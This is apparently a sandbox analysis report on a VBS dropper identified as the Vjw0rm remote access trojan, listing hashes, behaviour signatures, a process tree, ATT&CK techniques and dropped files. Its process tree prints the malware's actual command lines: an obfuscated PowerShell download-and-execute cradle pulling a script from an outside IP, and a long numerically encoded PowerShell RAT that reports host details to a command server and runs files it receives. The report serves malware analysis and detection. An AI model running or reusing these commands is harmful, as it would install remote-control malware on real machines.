Analysis

  • max time kernel
    137s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    23-07-2021 15:42

General

  • Target

    N10122504542.vbs

  • Size

    222B

  • MD5

    525e82abf80d9b94e67411a21b2cc770

  • SHA1

    53039125576e8375c07980c298874fc90a61cfda

  • SHA256

    44a6ab8793ef79cc7c270c17c7390297f2532a5351bc9cc330afeb61cca6d1a0

  • SHA512

    358aa84833473ef2fcf5110f92bf12d74e2f3494dd6db69ab010682a6da937ca7db59d32e1a83b10dc2ba9e6a058c22aa8887b6000692655e51ab76dcf690b9d

Score
10/10

Malware Config

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 7 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 33 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N10122504542.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://bit.ly/3xWNCW9
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow'); $Dont='adString(''http://185.81.157.24/3313/3.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\vb.vbs"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1960
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\test.ps1
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1320
                • C:\Windows\system32\Dism.exe
                  "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:NetFX3
                  8⤵
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2008
                  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\dismhost.exe
                    C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\dismhost.exe {AC976AD5-48FE-422A-8CB2-3AE0729A3456}
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Windows directory
                    PID:1348
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\alosh.ps1
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1816
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\msi.js"
          4⤵
          • Drops startup file
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy rEmOtEsIgNeD -Command Invoke-Expression ([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,87,105,110,100,111,119,115,46,70,111,114,109,115,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,13,10,36,104,116,116,112,111,98,106,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,13,10,36,104,32,61,32,34,49,56,53,46,56,49,46,49,53,55,46,55,34,13,10,36,112,32,61,32,34,51,51,49,51,34,13,10,36,86,98,115,80,97,116,104,32,61,32,34,37,86,98,115,112,97,116,104,37,34,13,10,36,83,84,85,80,67,111,112,121,32,61,32,34,37,83,116,97,114,116,117,112,37,34,13,10,36,115,112,108,32,61,32,34,124,86,124,34,13,10,36,69,114,114,111,114,65,99,116,105,111,110,80,114,101,102,101,114,101,110,99,101,32,61,32,39,83,105,108,101,110,116,108,121,67,111,110,116,105,110,117,101,39,13,10,13,10,102,117,110,99,116,105,111,110,32,73,110,115,40,41,32,123,13,10,32,32,32,32,36,68,101,115,116,105,110,97,116,105,111,110,32,61,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,52,32,43,32,51,41,32,43,32,34,92,34,32,43,32,34,83,121,115,116,101,109,84,114,97,121,54,52,46,106,115,34,13,10,32,32,32,32,105,102,32,40,36,83,84,85,80,67,111,112,121,32,45,101,113,32,34,84,114,117,101,34,41,32,123,13,10,32,32,32,32,32,32,32,36,67,111,109,109,97,110,100,32,61,32,40,66,105,110,97,114,121,50,83,116,114,105,110,103,40,34,44,46,44,44,44,44,46,46,44,46,46,44,46,46,46,46,44,46,46,46,44,44,44,44,44,46,46,46,46,44,44,46,44,44,46,44,46,46,44,46,44,46,44,44,46,44,44,46,44,46,46,46,44,46,44,44,44,46,46,44,44,46,44,46,44,46,46,44,46,46,44,46,34,46,82,101,112,108,97,99,101,40,34,44,34,44,32,34,48,34,41,46,82,101,112,108,97,99,101,40,34,46,34,44,32,34,49,34,41,41,41,32,43,32,34,32,39,34,32,43,32,36,86,98,115,80,97,116,104,32,43,32,34,39,32,39,34,32,43,32,36,68,101,115,116,105,110,97,116,105,111,110,32,43,32,34,39,34,13,10,32,32,32,32,32,32,32,35,73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110,32,36,67,111,109,109,97,110,100,13,10,32,32,32,32,125,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,71,101,116,45,65,110,116,105,118,105,114,117,115,78,97,109,101,32,123,13,10,91,99,109,100,108,101,116,66,105,110,100,105,110,103,40,41,93,32,32,32,32,32,13,10,112,97,114,97,109,32,40,32,13,10,91,115,116,114,105,110,103,93,36,67,111,109,112,117,116,101,114,78,97,109,101,32,61,32,34,36,101,110,118,58,99,111,109,112,117,116,101,114,110,97,109,101,34,32,44,32,13,10,36,67,114,101,100,101,110,116,105,97,108,32,13,10,41,32,13,10,32,32,32,32,66,69,71,73,78,32,32,13,10,32,32,32,32,32,32,32,32,123,13,10,32,32,32,32,32,32,32,32,32,32,32,32,36,119,109,105,81,117,101,114,121,32,61,32,34,83,69,76,69,67,84,32,42,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116,34,13,10,32,32,32,32,32,32,32,32,125,13,10,32,32,32,32,80,82,79,67,69,83,83,32,32,13,10,32,32,32,32,32,32,32,32,123,13,10,32,32,32,32,32,32,32,32,32,32,32,32,36,65,110,116,105,118,105,114,117,115,80,114,111,100,117,99,116,32,61,32,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,78,97,109,101,115,112,97,99,101,32,34,114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50,34,32,45,81,117,101,114,121,32,36,119,109,105,81,117,101,114,121,32,32,64,112,115,98,111,117,110,100,112,97,114,97,109,101,116,101,114,115,32,32,32,32,32,32,32,32,32,32,13,10,32,32,32,32,32,32,32,32,32,32,32,32,114,101,116,117,114,110,32,36,65,110,116,105,118,105,114,117,115,80,114,111,100,117,99,116,46,100,105,115,112,108,97,121,78,97,109,101,13,10,32,32,32,32,32,32,32,32,125,32,13,10,32,32,32,32,69,78,68,32,123,32,13,10,32,32,32,32,32,32,32,32,125,32,13,10,125,13,10,13,10,70,117,110,99,116,105,111,110,32,66,105,110,97,114,121,50,83,116,114,105,110,103,40,91,83,116,114,105,110,103,93,32,36,100,97,116,97,41,32,123,13,10,32,32,32,32,36,98,121,116,101,76,105,115,116,32,61,32,91,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,93,58,58,110,101,119,40,41,13,10,32,32,32,32,102,111,114,32,40,36,105,32,61,32,48,59,32,36,105,32,45,108,116,32,36,100,97,116,97,46,76,101,110,103,116,104,59,32,36,105,32,43,61,56,41,32,123,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,76,105,115,116,46,65,100,100,40,91,67,111,110,118,101,114,116,93,58,58,84,111,66,121,116,101,40,36,100,97,116,97,46,83,117,98,115,116,114,105,110,103,40,36,105,44,32,56,41,44,32,50,41,41,13,10,32,32,32,32,125,13,10,32,32,32,32,114,101,116,117,114,110,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,65,83,67,73,73,46,71,101,116,83,116,114,105,110,103,40,36,98,121,116,101,76,105,115,116,46,84,111,65,114,114,97,121,40,41,41,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,80,79,83,84,40,36,68,65,44,32,36,80,97,114,97,109,41,32,123,13,10,36,82,101,115,112,111,110,115,101,84,101,120,116,32,61,32,34,34,13,10,116,114,121,13,10,123,13,10,36,104,116,116,112,111,98,106,46,79,112,101,110,40,34,80,79,83,84,34,44,32,34,104,116,116,112,58,47,47,34,32,43,32,36,104,32,43,32,34,58,34,32,43,32,36,112,32,43,32,34,47,34,32,43,32,36,68,65,44,32,36,102,97,108,115,101,41,13,10,36,104,116,116,112,111,98,106,46,83,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,85,115,101,114,45,65,103,101,110,116,58,34,44,32,36,105,110,102,111,41,13,10,36,104,116,116,112,111,98,106,46,83,101,110,100,40,36,80,97,114,97,109,41,13,10,36,82,101,115,112,111,110,115,101,84,101,120,116,32,61,32,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,84,111,83,116,114,105,110,103,40,36,104,116,116,112,111,98,106,46,82,101,115,112,111,110,115,101,84,101,120,116,41,13,10,125,32,99,97,116,99,104,32,123,32,125,13,10,114,101,116,117,114,110,32,36,82,101,115,112,111,110,115,101,84,101,120,116,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,105,110,102,32,123,13,10,32,32,32,32,36,97,118,32,61,32,71,101,116,45,65,110,116,105,118,105,114,117,115,78,97,109,101,13,10,32,32,32,32,36,118,114,32,61,32,34,118,50,46,48,34,13,10,32,32,32,32,36,109,97,99,32,61,32,72,87,73,68,40,36,101,110,118,58,99,111,109,112,117,116,101,114,110,97,109,101,41,13,10,32,32,32,32,36,105,100,32,61,32,36,119,111,114,109,73,68,32,43,32,34,34,32,43,32,36,109,97,99,13,10,32,32,32,32,36,111,115,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,40,71,101,116,45,87,77,73,79,98,106,101,99,116,32,119,105,110,51,50,95,111,112,101,114,97,116,105,110,103,115,121,115,116,101,109,41,46,110,97,109,101,44,34,124,34,41,91,48,93,32,43,32,34,32,34,32,43,32,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109,41,46,79,83,65,114,99,104,105,116,101,99,116,117,114,101,13,10,32,32,32,32,114,101,116,117,114,110,32,36,105,100,32,43,32,34,92,34,32,43,32,40,36,101,110,118,58,67,79,77,80,85,84,69,82,78,65,77,69,41,32,43,32,34,92,34,32,43,32,40,36,101,110,118,58,85,115,101,114,78,97,109,101,41,32,43,32,34,92,34,32,43,32,36,111,115,32,43,32,34,92,34,32,43,32,36,97,118,32,43,32,34,92,34,32,43,32,34,89,101,115,34,32,43,32,34,92,34,32,43,32,34,89,101,115,34,32,43,32,34,92,34,32,43,32,34,70,65,76,83,69,34,32,43,32,34,92,34,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,72,87,73,68,40,36,115,116,114,67,111,109,112,117,116,101,114,41,32,123,13,10,36,69,114,114,111,114,65,99,116,105,111,110,80,114,101,102,101,114,101,110,99,101,32,61,32,39,83,105,108,101,110,116,108,121,67,111,110,116,105,110,117,101,39,13,10,32,32,32,32,36,108,111,108,32,61,32,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,84,111,83,116,114,105,110,103,40,40,103,101,116,45,119,109,105,111,98,106,101,99,116,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,80,114,111,100,117,99,116,32,32,124,32,83,101,108,101,99,116,45,79,98,106,101,99,116,32,45,69,120,112,97,110,100,80,114,111,112,101,114,116,121,32,85,85,73,68,41,41,13,10,32,32,32,32,114,101,116,117,114,110,32,40,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,36,108,111,108,44,39,45,39,41,91,48,93,32,43,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,36,108,111,108,44,39,45,39,41,91,49,93,41,13,10,125,13,10,13,10,36,105,110,102,111,32,61,32,105,110,102,13,10,73,110,115,13,10,13,10,119,104,105,108,101,40,36,116,114,117,101,41,13,10,123,13,10,36,65,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,40,80,79,83,84,40,34,86,114,101,34,44,32,34,34,41,41,32,44,32,36,115,112,108,41,13,10,115,119,105,116,99,104,40,36,65,91,48,93,41,32,123,13,10,32,32,34,82,70,34,32,123,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,65,91,50,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,66,121,116,101,115,40,36,84,97,114,103,101,116,80,97,116,104,44,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,66,121,116,101,115,40,36,65,91,49,93,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,84,82,34,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,80,115,70,105,108,101,78,97,109,101,32,61,32,32,91,83,121,115,116,101,109,46,71,117,105,100,93,58,58,78,101,119,71,117,105,100,40,41,46,84,111,83,116,114,105,110,103,40,41,46,82,101,112,108,97,99,101,40,34,45,34,44,32,34,34,41,32,43,32,34,46,80,83,49,34,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,80,115,70,105,108,101,78,97,109,101,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,65,91,49,93,41,13,10,32,32,32,32,80,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,84,97,114,103,101,116,80,97,116,104,13,10,13,10,32,32,32,32,35,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,34,32,43,32,36,80,115,70,105,108,101,78,97,109,101,46,82,101,112,108,97,99,101,40,34,46,80,83,49,34,44,32,34,46,99,109,100,34,41,44,32,34,80,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,119,105,110,100,111,119,115,116,121,108,101,32,104,105,100,100,101,110,32,45,70,105,108,101,32,34,32,43,32,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,101,120,99,34,32,123,13,10,32,32,32,32,36,70,105,108,101,110,97,109,101,32,61,32,45,106,111,105,110,32,40,40,54,53,46,46,57,48,41,32,43,32,40,57,55,46,46,49,50,50,41,32,124,32,71,101,116,45,82,97,110,100,111,109,32,45,67,111,117,110,116,32,53,32,124,32,37,32,123,91,99,104,97,114,93,36,95,125,41,32,43,32,34,46,118,98,115,34,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,70,105,108,101,110,97,109,101,13,10,32,32,32,32,36,67,117,114,114,83,99,32,61,32,36,65,91,49,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,67,117,114,114,83,99,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,83,99,34,32,123,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,65,91,50,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,65,91,49,93,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,34,67,108,34,32,123,13,10,32,32,32,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,69,120,105,116,40,48,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,85,110,34,32,123,13,10,32,32,32,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,69,120,105,116,40,48,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,125,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,51,48,48,48,41,13,10,125)))
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1744

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    15a11b8e815555469802a40b3e2cf409

    SHA1

    13abbf989c033fdec9862c1167c14267a6890431

    SHA256

    677e9b21ed45c13c96932494a287361638ba878fbb601dae1c2585cdb77f8dc1

    SHA512

    2bc6313faf6fbb99cbf1cae0d956cef50f1d0d8a4450d526f0ae4fb8ae422c3117782423005f03052db283b2e0f6756add064dde53bc469d1e6a27a07dfe84dc

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\CbsProvider.dll
    MD5

    efcb002abc3529d71b61e6fb6434566c

    SHA1

    a25aca0fc9a1139f44329b28dc13c526965d311f

    SHA256

    b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd

    SHA512

    10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\CompatProvider.dll
    MD5

    6a4bd682396f29fd7df5ab389509b950

    SHA1

    46f502bec487bd6112f333d1ada1ec98a416d35f

    SHA256

    328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb

    SHA512

    35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\DismCore.dll
    MD5

    f2b0771a7cd27f20689e0ab787b7eb7c

    SHA1

    eb56e313cd23cb77524ef0db1309aebb0b36f7ef

    SHA256

    7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f

    SHA512

    5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\DismCorePS.dll
    MD5

    5488e381238ff19687fdd7ab2f44cfcc

    SHA1

    b90fa27ef6a7fc6d543ba33d5c934180e17297d3

    SHA256

    abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0

    SHA512

    933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\DismHost.exe
    MD5

    9a821d8d62f4c60232b856e98cba7e4f

    SHA1

    4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5

    SHA256

    a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525

    SHA512

    1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\DmiProvider.dll
    MD5

    fc2db5842190c6e78a40cd7da483b27c

    SHA1

    e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0

    SHA256

    e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82

    SHA512

    d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\FolderProvider.dll
    MD5

    c9d74156913061be6c51d8fc3acf8e93

    SHA1

    4a4c6473a478256e4c78b423e918191118e01093

    SHA256

    af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37

    SHA512

    c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\IntlProvider.dll
    MD5

    bbb9e4fa2561f6a6e5ccf25da069ac1b

    SHA1

    2d353ec70c7a13ac5749d2205ac732213505082a

    SHA256

    b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1

    SHA512

    01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\LogProvider.dll
    MD5

    62de64dc805fd98af3ada9d93209f6a9

    SHA1

    392ba504973d626aaf5c5b41b184670c58ec65a7

    SHA256

    83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc

    SHA512

    7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\MsiProvider.dll
    MD5

    45ff4fa5ca5432bfccded4433fe2a85b

    SHA1

    858c42499dd9d2198a6489dd310dc5cbff1e8d6e

    SHA256

    8a85869b2d61bad50d816daf08df080f8039dbeb1208009a73daa7be83d032bd

    SHA512

    abbe0f673d18cc9a922cfd677e5b88714a3049ad8937f836b5a8b9bddac5ddbad4dc143360efc018dcd3a3440aa3e516b1a97f7cd2fa9a55cb73739dedef1589

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\OSProvider.dll
    MD5

    e7caed467f80b29f4e63ba493614dbb1

    SHA1

    65a159bcdb68c7514e4f5b65413678c673d2d0c9

    SHA256

    2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c

    SHA512

    34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\SmiProvider.dll
    MD5

    fe447d1cd38cecac2331fa932078d9a0

    SHA1

    ebd99d5eb3403f547821ce51c193afc86ecf4bcf

    SHA256

    05fe0897be3f79773c06b7ba4c152eec810fd895bf566d837829ec04c4f4338d

    SHA512

    801e47c6c62a2d17ed7dd430a489507faf6074471f191f66862fd732924ad9a4bd1efe603354ed06d16c4d5c31a044126c4cc2dbbd8ffece2ed7632358ee7779

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\TransmogProvider.dll
    MD5

    739968678548ba15f6b9372e8760c012

    SHA1

    691b09af08b64b01c3db7ffe2aa625c9be375686

    SHA256

    4ce7afb5c5a44c4c9d0119d7306134e3412467bddcbf5b7da2786e5d64528d11

    SHA512

    8075d3ce9e462777b143fad03f25ddb6cc8b5e2512aa475850eba39a5ef3be3364e7704620b8c444449bbe143b6ffa307428b93bc5e7e0b5738cf36aaf0c969b

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\UnattendProvider.dll
    MD5

    8d3855b133e21143e8b4bfadb9fb14a3

    SHA1

    25d729e8455a1f19d0dc59c0962908a146a62935

    SHA256

    3b3118cb4a65cb27a182d044c7b9cfc17581d3fabab094d174b5e54df4ddf5e4

    SHA512

    4e67bcc6f6bd396350d550f5564dd9b1d939d8b6a48706280ee5c1b7205579355dfeb5425f99656455d958f6b61ceee3986488d27de824ed5b9ce14e43aea5f5

  • C:\Users\Admin\AppData\Local\Temp\8170331E-F7DC-42E6-8557-1F039918BF1F\dismprov.dll
    MD5

    8ca117cb9338c0351236939717cb7084

    SHA1

    baa145810d50fdb204c8482fda5cacaaf58cdad0

    SHA256

    f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54

    SHA512

    35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35

